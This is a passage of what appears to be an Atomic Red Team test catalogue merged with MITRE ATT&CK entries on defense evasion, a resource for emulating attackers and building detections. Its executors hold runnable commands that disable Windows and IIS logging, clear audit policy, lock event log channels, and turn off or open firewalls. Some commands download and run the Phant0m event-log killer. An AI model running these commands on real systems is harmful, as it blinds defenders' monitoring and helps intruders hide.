if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
name: powershell
- name: Disable Windows IIS HTTP Logging via PowerShell
auto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
supported_platforms:
- windows
input_arguments:
website_name:
description: The name of the website on a server
type: string
default: Default Web Site
executor:
command: 'set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\"
-filter "system.webServer/httpLogging" -name dontLog -value $true
'
cleanup_command: |
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}
name: powershell
- name: Kill Event Log Service Threads
auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd
description: Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING
you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
supported_platforms:
- windows
executor:
command: |
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m
cleanup_command: |
Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Impair Windows Audit Log Policy
auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
description: |-
Disables the windows audit policy to prevent key host based telemetry being written into the event logs.
[Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
supported_platforms:
- windows
executor:
command: |
auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable
cleanup_command: |
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
name: command_prompt
elevation_required: true
- name: Clear Windows Audit Policy Config
auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
description: Clear the Windows audit policy using auditpol utility. This action
would stop certain audit events from being recorded in the security log.
supported_platforms:
- windows
executor:
command: |
auditpol /clear /y
auditpol /remove /allusers
cleanup_command: |
auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
name: command_prompt
elevation_required: true
- name: Disable Event Logging with wevtutil
auto_generated_guid: b26a3340-dad7-4360-9176-706269c74103
description: "Wevtutil can be used to disable logs. \nNOTE: RansomEXX ransomware
uses this to disable Security logs post-encryption.\n"
supported_platforms:
- windows
input_arguments:
log_name:
description: Name of the log to be disabled
type: string
default: Microsoft-Windows-IKE/Operational
executor:
command: 'wevtutil sl "#{log_name}" /e:false
'
cleanup_command: 'wevtutil sl "#{log_name}" /e:true
'
name: command_prompt
- name: Makes Eventlog blind with Phant0m
auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
description: 'Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
'
supported_platforms:
- windows
input_arguments:
file_name:
description: exe version of Phant0m
type: path
default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
dependency_executor_name: powershell
dependencies:
- description: 'Phant0m.exe must exist on disk at specified location (#{file_name})
'
prereq_command: 'if (Test-Path "#{file_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
executor:
command: '"#{file_name}"
'
cleanup_command: 'echo "Sorry you have to reboot"
'
name: command_prompt
- name: Modify Event Log Channel Access Permissions via Registry - PowerShell
auto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational
description: Path to the event log service channel to alter
executor:
command: "Set-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value
\"O:SYG:SYD:(D;;0x1;;;WD)\"\nRestart-Service -Name EventLog -Force -ErrorAction
Ignore "
cleanup_command: |-
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S-1-15-3-1024-3153509613-960666767-3724611135-2725662640-12138253-543910227-1950414635-4190290187)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell
auto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log Channel by altering the "ChannelAccess" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
ChannelPath:
type: string
default: HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\Setup
description: Path to the event log service channel to alter
executor:
command: |-
New-Item -Path #{ChannelPath} -Force
Set-ItemProperty -Path #{ChannelPath} -Name "ChannelAccess" -Value "O:SYG:SYD:(D;;0x1;;;WD)"
Restart-Service -Name EventLog -Force -ErrorAction Ignore
cleanup_command: |-
Remove-Item -Path #{ChannelPath} -Force
Restart-Service -Name EventLog -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Modify Event Log Access Permissions via Registry - PowerShell
auto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1
description: |-
This test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the "CustomSD" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel.
Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
supported_platforms:
- windows
input_arguments:
CustomSDPath:
type: string
default: HKLM:\SYSTEM\CurrentControlSet\Services\EventLog\System
description: Path to the event log service channel to alter
executor:
command: 'Set-ItemProperty -Path #{CustomSDPath} -Name "CustomSD" -Value "O:SYG:SYD:(D;;0x1;;;WD)"'
cleanup_command: 'Remove-ItemProperty -Path #{CustomSDPath} -Name "CustomSD"'
name: powershell
elevation_required: true
T1218.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f
created: '2020-01-23T19:59:52.630Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/002
external_id: T1218.002
- source_name: Microsoft Implementing CPL
description: M. (n.d.). Implementing Control Panel Items. Retrieved January
18, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
- source_name: TrendMicro CPL Malware Jan 2014
description: Mercês, F. (2014, January 27). CPL Malware - Malicious Control
Panel Items. Retrieved January 18, 2018.
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
- source_name: TrendMicro CPL Malware Dec 2013
description: Bernardino, J. (2013, December 17). Control Panel Files Used
As Malicious Attachments. Retrieved January 18, 2018.
url: https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/
- source_name: Palo Alto Reaver Nov 2017
description: Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New
Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.
url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/
- source_name: ESET InvisiMole June 2020
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:45.979Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- ESET
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1218.002
atomic_tests:
- name: Control Panel Items
auto_generated_guid: 037e9d8a-9e46-4255-8b33-2ae3b545ca6f
description: |
This test simulates an adversary leveraging control.exe
Upon execution calc.exe will be launched
supported_platforms:
- windows
input_arguments:
cpl_file_path:
description: path to cpl file
type: path
default: PathToAtomicsFolder\T1218.002\bin\calc.cpl
dependency_executor_name: powershell
dependencies:
- description: 'Cpl file must exist on disk at specified location (#{cpl_file_path})
'
prereq_command: 'if (Test-Path "#{cpl_file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{cpl_file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}"
executor:
command: 'control.exe "#{cpl_file_path}"
'
name: command_prompt
T1599.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de
created: '2020-10-19T16:48:08.241Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1599/001
external_id: T1599.001
- source_name: RFC1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
url: https://tools.ietf.org/html/rfc1918
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:46.071Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
to NAT may enable an adversary to bypass restrictions on traffic routing that
otherwise separate trusted and untrusted networks.\n\nNetwork devices such
as routers and firewalls that connect multiple networks together may implement
NAT during the process of passing packets between networks. When performing
NAT, the network device will rewrite the source and/or destination addresses
of the IP address header. Some network designs require NAT for the packets
to cross the border device. A typical example of this is environments where
internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen
an adversary gains control of a network boundary device, they may modify NAT
configurations to send traffic between two separated networks, or to obscure
their activities. In network designs that require NAT to function, such modifications
enable the adversary to overcome inherent routing limitations that would normally
prevent them from accessing protected systems behind the border device. In
network designs that do not require NAT, adversaries may use address translation
to further obscure their activities, as changing the addresses of packets
that traverse a network boundary device can make monitoring data transmissions
more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
to change the operating system of a network device, implementing their own
custom NAT mechanisms to further obscure their activities."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1036.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--514dc7b3-0b80-4382-80a9-2e2d294f5019
created: '2025-03-27T20:37:52.269Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/011
external_id: T1036.011
- source_name: Microsoft XorDdos Linux Stealth 2022
description: 'Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or with Saurabh
Swaroop. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy
DDoS malware targeting Linux devices. Retrieved September 27, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/
- source_name: Sandfly BPFDoor 2022
description: The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive
Linux Backdoor Technical Analysis. Retrieved September 29, 2023.
url: https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:30.391Z'
name: Overwrite Process Arguments
description: "Adversaries may modify a process's in-memory arguments to change
its name in order to appear as a legitimate or benign process. On Linux, the
operating system stores command-line arguments in the process’s stack and
passes them to the `main()` function as the `argv` array. The first element,
`argv[0]`, typically contains the process name or path - by default, the command
used to actually start the process (e.g., `cat /etc/passwd`). By default,
the Linux `/proc` filesystem uses this value to represent the process name.
The `/proc//cmdline` file reflects the contents of this memory, and tools
like `ps` use it to display process information. Since arguments are stored
in user-space memory at launch, this modification can be performed without
elevated privileges. \n\nDuring runtime, adversaries can erase the memory
used by all command-line arguments for a process, overwriting each argument
string with null bytes. This removes evidence of how the process was originally
launched. They can then write a spoofed string into the memory region previously
occupied by `argv[0]` to mimic a benign command, such as `cat resolv.conf`.
The new command-line string is reflected in `/proc//cmdline` and displayed
by tools like `ps`.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos
Linux Stealth 2022) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.0'
atomic_tests: []
T1550:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814
created: '2020-01-30T16:18:36.873Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550
external_id: T1550
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- source_name: NIST Authentication
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
25, 2024.
url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:46.684Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
to move laterally within an environment and bypass normal system access controls.
\n\nAuthentication processes generally require a valid identity (e.g., username)
along with one or more authentication factors (e.g., password, pin, physical
smart card, token generator, etc.). Alternate authentication material is legitimately
generated by systems after a user or application successfully authenticates
by providing a valid identity and the required authentication factor(s). Alternate
authentication material may also be generated during the identity creation
process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate
authentication material allows the system to verify an identity has successfully
authenticated without asking the user to reenter authentication factor(s).
Because the alternate authentication must be maintained by the system—either
in memory or on disk—it may be at risk of being stolen through [Credential
Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate
authentication material, adversaries are able to bypass system access controls
and authenticate to systems without knowing the plaintext password or any
additional authentication factors.\n"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Containers
- Identity Provider
- Office Suite
- Linux
x_mitre_version: '1.5'
atomic_tests: []
T1562.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b
created: '2020-02-21T21:00:48.814Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/004
external_id: T1562.004
- source_name: Broadcom ESXi Firewall
description: Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi
Host by Using the VMware Host Client. Retrieved March 26, 2025.
url: https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html
- source_name: Huntress BlackCat
description: Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate
TTPs. Retrieved March 27, 2024.
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: Trellix Rnasomhouse 2024
description: Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver.
(2024, February 14). RansomHouse am See. Retrieved March 26, 2025.
url: https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
Retrieved September 12, 2024.'
url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:47.755Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules.
In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- macOS
- Network Devices
- Windows
x_mitre_version: '1.3'
identifier: T1562.004
atomic_tests:
- name: Disable Microsoft Defender Firewall
auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f
description: |
Disables the Microsoft Defender Firewall for the current profile.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
supported_platforms:
- windows
executor:
command: 'netsh advfirewall set currentprofile state off
'
cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
'
name: command_prompt
- name: Disable Microsoft Defender Firewall via Registry
auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
description: |
Disables the Microsoft Defender Firewall for the public profile via registry
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
supported_platforms:
- windows
executor:
command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 0 /f
'
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 1 /f
'
name: command_prompt
- name: Allow SMB and RDP on Microsoft Defender Firewall
auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
description: |
Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
supported_platforms:
- windows
executor:
command: |
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
cleanup_command: 'netsh advfirewall reset >nul 2>&1
'
name: command_prompt
- name: Opening ports for proxy - HARDRAIN
auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
description: |
This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.
reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
supported_platforms:
- windows
executor:
command: "netsh advfirewall firewall add rule name=\"atomic testing\" action=allow
dir=in protocol=TCP localport=450 \n"
cleanup_command: netsh advfirewall firewall delete rule name="atomic testing"
protocol=TCP localport=450 >nul 2>&1
name: command_prompt
elevation_required: true
- name: Open a local port through Windows Firewall to any profile
auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
description: This test will attempt to open a local port defined by input arguments
to any profile
supported_platforms:
- windows
input_arguments:
local_port:
description: This is the local port you wish to test opening
type: integer
default: 3389
executor:
command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in
protocol=tcp localport=#{local_port} action=allow profile=any
cleanup_command: netsh advfirewall firewall delete rule name="Open Port to
Any" | Out-Null
name: powershell
elevation_required: true
- name: Allow Executable Through Firewall Located in Non-Standard Location
auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c
description: This test will attempt to allow an executable through the system
firewall located in the Users directory
supported_platforms:
- windows
input_arguments:
exe_file_path:
description: path to exe file
type: path
default: PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe
executor:
command: |
Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force
netsh advfirewall firewall add rule name="Atomic Test" dir=in action=allow program="C:\Users\$env:UserName\AtomicTest.exe" enable=yes
cleanup_command: |
netsh advfirewall firewall delete rule name="Atomic Test" | Out-Null
Remove-Item C:\Users\$env:UserName\AtomicTest.exe -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Stop/Start UFW firewall
auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a
description: 'Stop the Uncomplicated Firewall (UFW) if installed.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if ufw is installed on the machine.
'
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: 'ufw disable
'
cleanup_command: |
ufw enable
ufw status verbose
- name: Stop/Start Packet Filter
auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7
description: 'Stop the Packet Filter if installed.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if pfctl is installed on the machine.
'
prereq_command: "if [ ! -x \"$(command -v pfctl)\" ]; then echo -e \"\\n*****
PF NOT installed *****\\n\"; exit 1; fi\nif [ \"$(kldstat -n pf)\" = \"\"
]; then echo -e \"\\n***** PF inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
service pf stop
service pf disable
cleanup_command: |
service pf enable
service pf start
service pf status
- name: Stop/Start UFW firewall systemctl
auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1
description: "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.
\n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if systemctl and ufw is installed on the machine.
'
prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n*****
systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v
ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1;
fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n*****
ufw inactive *****\\n\"; exit 1; fi \n"
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: 'systemctl stop ufw
'
cleanup_command: |
systemctl start ufw
systemctl status ufw
- name: Turn off UFW logging
auto_generated_guid: 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad
description: "Turn off the Uncomplicated Firewall (UFW) logging. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if ufw is installed on the machine and enabled.
'
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: 'ufw logging off
'
cleanup_command: |
ufw logging low
ufw status verbose
- name: Add and delete UFW firewall rules
auto_generated_guid: b2563a4e-c4b8-429c-8d47-d5bcb227ba7a
description: "Add and delete a rule on the Uncomplicated Firewall (UFW) if installed
and enabled. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if ufw is installed on the machine and enabled.
'
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
'
executor:
name: sh
elevation_required: true
command: |
ufw prepend deny from 1.2.3.4
ufw status numbered
cleanup_command: |
{ echo y; echo response; } | ufw delete 1
ufw status numbered
- name: Add and delete Packet Filter rules
auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b
description: "Add and delete a rule on the Packet Filter (PF) if installed and
enabled. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if pf is installed on the machine and enabled.
